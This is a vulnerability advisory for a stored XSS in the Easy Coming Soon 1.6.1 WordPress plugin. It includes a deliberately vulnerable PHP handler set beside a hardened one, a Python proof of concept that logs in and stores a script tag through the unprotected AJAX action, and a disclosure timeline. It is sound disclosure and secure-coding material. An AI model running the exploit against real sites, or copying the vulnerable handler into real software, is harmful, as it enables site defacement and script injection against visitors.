Easy Coming Soon 1.6.1, Persistent XSS
The AJAX action ‘coming_soon_page_settings’, defined in ‘easy-coming-soon/coming-soon-plugin.php’, can be called by any registered user; the handler performs no capability check. Any registered account, regardless of role, can therefore enable the ‘Easy Coming Soon’ page and rewrite the plugin’s settings, and because those settings are rendered without output encoding, the attacker can serve arbitrary HTML/JavaScript to every visitor of the site.
Homepage
https://wordpress.org/plugins/easy-coming-soon/
CVSS Score
4
CVSS Vector (v2)
(AV:N/AC:L/Au:S/C:N/I:P/A:N)
Attack Scope
remote
Authorization Required
Registered
Mitigation
Update to version 1.6.3.
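For developers maintaining similar plugins, the following is an added example written for this advisory, not code from the Easy Coming Soon plugin or from its 1.6.3 fix. It shows the handler pattern that produces this bug class beside a hardened version. WordPress fires ‘wp_ajax_{action}’ hooks for every authenticated user, so authorization has to happen inside the callback. The option names, the nonce action and the ‘ecs_’ function names are assumptions for illustration.

```php
<?php
// Hypothetical illustration of the bug class and its fix; not the plugin's actual code.
// Option names, nonce action and 'ecs_' function names are assumptions.

// --- Vulnerable pattern ---------------------------------------------------
// wp_ajax_{action} runs for ANY logged-in user. Without a capability check,
// a nonce or input sanitisation, every registered user can rewrite the
// settings, and every visitor then receives the stored payload unescaped.
function ecs_vulnerable_settings_handler() {
    update_option( 'ecs_status', $_POST['status'] );
    update_option( 'ecs_title', $_POST['title'] );   // stored verbatim
    echo 'saved';
    wp_die();
}
// add_action( 'wp_ajax_coming_soon_page_settings', 'ecs_vulnerable_settings_handler' );

function ecs_vulnerable_render_title() {
    echo '<h1>' . get_option( 'ecs_title' ) . '</h1>'; // unescaped output
}

// --- Hardened pattern -----------------------------------------------------
function ecs_hardened_settings_handler() {
    // 1. Authorisation: only users allowed to change site options.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    // 2. CSRF: the request must carry a nonce minted for this action.
    check_ajax_referer( 'ecs_settings_nonce', 'nonce' );

    // 3. Input validation: coerce each field to its expected type before storing.
    $status = ( isset( $_POST['status'] ) && '1' === $_POST['status'] ) ? 1 : 0;
    $title  = isset( $_POST['title'] )
        ? sanitize_text_field( wp_unslash( $_POST['title'] ) )
        : '';

    update_option( 'ecs_status', $status );
    update_option( 'ecs_title', $title );
    wp_send_json_success( array( 'status' => $status, 'title' => $title ) );
}
add_action( 'wp_ajax_coming_soon_page_settings', 'ecs_hardened_settings_handler' );

// 4. Output encoding: escape at render time regardless of what is stored,
//    so a value written by an older version or another code path is still safe.
function ecs_hardened_render_title() {
    echo '<h1>' . esc_html( get_option( 'ecs_title', '' ) ) . '</h1>';
}

// The settings page script must send a matching nonce, e.g. via:
// wp_localize_script( 'ecs-admin', 'ecsAjax',
//     array( 'nonce' => wp_create_nonce( 'ecs_settings_nonce' ) ) );
```

With the capability check in place, the proof-of-concept request below is rejected for a non-administrator; the nonce check stops a logged-in administrator from being tricked into submitting it cross-site, and the output escaping closes the XSS even if an unsanitised value is already stored.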
Proof of Concept
import requests

# Credentials of any registered account on the target; no elevated role is needed
s = requests.Session()
target = 'http://localhost'

# Step 1: authenticate to obtain the logged-in session cookies
url = '%s/wp-login.php' % target
payload = {
    "log": "test",
    "pwd": "test",
    "wp-submit": "Log In"
}
r = s.post(url, data=payload)

# Step 2: call the unprotected AJAX action to enable the coming-soon page and
# store a script tag as its title; the title is rendered unescaped to every visitor
url = '%s/wp-admin/admin-ajax.php' % target
payload = {
    "action": "coming_soon_page_settings",
    "status": "1",
    "title": "<script>alert(1)</script>"
}
r = s.post(url, data=payload)
print(r.status_code, r.text)
Timeline
- 2015-02-10: Discovered
- 2015-02-10: Vendor notified
- 2015-02-10: Vendor responded
- 2015-02-10: 1.6.2 released – issue still present
- 2015-03-02: Requested follow-up – provided example of how to resolve issue.
- 2015-03-09: Requested follow-up
- 2015-03-11: Version 1.6.3 released – issue resolved
- 2015-03-18: Advisory released